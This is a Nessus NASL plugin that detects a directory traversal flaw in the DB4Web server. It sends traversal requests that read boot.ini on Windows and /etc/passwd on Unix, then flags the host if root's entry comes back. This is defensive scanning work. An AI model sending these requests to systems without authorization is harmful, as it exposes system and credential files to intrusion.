# The script was written by Michel Arboi <arboi@bigfoot.com>
# GNU Public Licence
#
# References:
#
# From:Stefan.Bagdohn@guardeonic.com
# To:vulnwatch@vulnwatch.org 
# Date: Thu, 19 Sep 2002 11:00:55 +0200
# Subject: Advisory: File disclosure in DB4Web
#

if(description)
{
 script_id(11182);
 script_version ("$Revision: 1.1.2.2 $");
  
 name["english"] = "DB4Web directory traversal";
 script_name(english:name["english"]);
 
 desc["english"] = "It is possible to read any file on your 
system through the DB4Web server.

Solution : Upgrade your software.

Risk factor : High";


 desc["francais"] = "Il est possible de lire n'importe quel 
fichier via le serveur DB4Web

Solution : Mettez  jour votre logiciel 

Facteur de risque : Elev";




 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Read any file through DB4Web";
 summary["francais"] = "Lit n'importe quel fichier via DB4Web";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_ATTACK);
 
 
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
		francais:"Ce script est Copyright (C) 2002 Michel Arboi");	

 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 	

 script_dependencie("find_service.nes", "no404.nasl", "httpver.nasl");
 script_require_ports("Services/www", 80);
 # script_require_keys("www/db4web");
 exit(0);
}

#
include("http_func.inc");

port = get_kb_item("Services/www");
if (! port) port = 80;
if (! get_port_state(port)) exit(0);

cgibin = cgibin();


# Windows

if (is_cgi_installed(port:port, item:string(cgibin, "/db4web_c.exe"))
{
  k = string("www/no404/", port);
  qc=1;
  if (get_kb_item(k)) qc=0;

  u = string(cgibin, "/dbdirname/c%3A%5Cboot.ini");
  if (check_win_dir_trav(port: port, url: u, quickcheck: qc)) {
    security_hole(port);
    exit(0);
  }
}

# Unix
if (is_cgi_installed(port:port, item:string(cgibin, "/db4web_c"))
{
  s = http_open_socket(port);
  if (!s) exit(0);
  u = string(cgibin, "/dbdirname//etc/passwd");
  req = http_get(port: port, item: u);
  send(socket: s, data: req);
  r = http_recv(port: port);
  http_close_socket(s);
  if(egrep(pattern:".*root:.*:0:0:.*", string:r))
  {
    security_hole(port);
    exit(0);
  }
}
